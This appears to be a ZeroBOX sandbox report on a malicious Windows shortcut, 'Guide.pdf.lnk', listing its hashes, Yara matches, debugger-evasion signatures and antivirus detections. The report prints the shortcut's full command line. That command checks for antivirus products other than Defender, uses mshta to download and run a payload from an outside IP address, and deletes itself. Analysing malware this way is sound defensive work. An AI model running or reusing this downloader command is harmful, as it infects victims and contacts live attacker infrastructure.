Summary | ZeroBOX

Guide.pdf.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format
Category FILE
Machine s1_win7_x6402
Started July 31, 2024, 9:34 a.m.
Completed July 31, 2024, 9:37 a.m.
Size 15.2KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Fri May 6 20:20:19 2022, mtime=Fri Jul 26 00:24:11 2024, atime=Fri May 6 20:20:19 2022, length=41472, window=hidenormalshowminimized
MD5 0e5138203d1ba9f34206bdde51374198
SHA256 95302ad9f4452d0ac02d3c364517ee72ecb3cc718c6926cb5c05f6955ec2b8e8
CRC32 C745EAB9
ssdeep 24:85K0V0+9u6ppyAgkg+/431cI1tMwcwm1B+8PxKqe15ZK1wYQOddqVnvr9doab5Mc:8Qr+9VRy1zMKIB7wqaczd0hvr9uals
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

API: WriteConsoleW
buffer: ERROR: Invalid argument/option - '$R'. Type "FORFILES /?" for usage.
console_handle: 0x0000000b
status: 1
return: 1
repeated: 0
file C:\Users\test22\AppData\Local\Temp\Guide.pdf.lnk
cmdline "C:\Windows\System32\forfiles.exe" $R = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($T in $R ){if ($T.displayName -replace 'Windows Defender', ''){Exit}}/p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://141.98.234.166/Yotsuba";$GhUV = Get-Location;$GhUV = Join-Path $GhUV 'Guide.pdf.lnk';del $GhUV
  • DebuggerCheck__GlobalFlags - (no description)
  • DebuggerCheck__QueryInfo - (no description)
  • DebuggerHiding__Thread - (no description)
  • DebuggerHiding__Active - (no description)
  • ThreadControl__Context - (no description)
  • SEH__vectored - (no description)
  • anti_dbg - Checks if being debugged
  • disable_dep - Bypass DEP
cmdline "C:\Windows\System32\forfiles.exe" $R = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($T in $R ){if ($T.displayName -replace 'Windows Defender', ''){Exit}}/p C:\Windows\System32 /m calc.exe /c "powershell . mshta http://141.98.234.166/Yotsuba";$GhUV = Get-Location;$GhUV = Join-Path $GhUV 'Guide.pdf.lnk';del $GhUV
Process injection: Process 3016 resumed a thread in remote process 2216

API: NtResumeThread
thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2216
status: 1
return: 0
repeated: 0
Malwarebytes Trojan.Downloader.Generic
VIPRE Heur.BZC.YAX.Pantera.47.5F1CFF92
Arcabit Heur.BZC.YAX.Pantera.47.5F1CFF92
Symantec CL.Downloader!gen111
Avast LNK:Agent-EJ [Trj]
Kaspersky HEUR:Trojan.Multi.Agent.gen
BitDefender Heur.BZC.YAX.Pantera.47.5F1CFF92
MicroWorld-eScan Heur.BZC.YAX.Pantera.47.5F1CFF92
Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Emsisoft Heur.BZC.YAX.Pantera.47.5F1CFF92 (B)
F-Secure Trojan:W32/LnkGen.C
FireEye Heur.BZC.YAX.Pantera.47.5F1CFF92
Sophos Troj/DownLnk-X
SentinelOne Static AI - Suspicious LNK
Google Detected
MAX malware (ai score=85)
Microsoft Trojan:Win32/WinLNK.HNE!MTB
ZoneAlarm HEUR:Trojan.Multi.Agent.gen
GData Heur.BZC.YAX.Pantera.47.5F1CFF92
AhnLab-V3 LNK/Autorun.Gen
huorong TrojanDownloader/LNK.Agent.da
AVG LNK:Agent-EJ [Trj]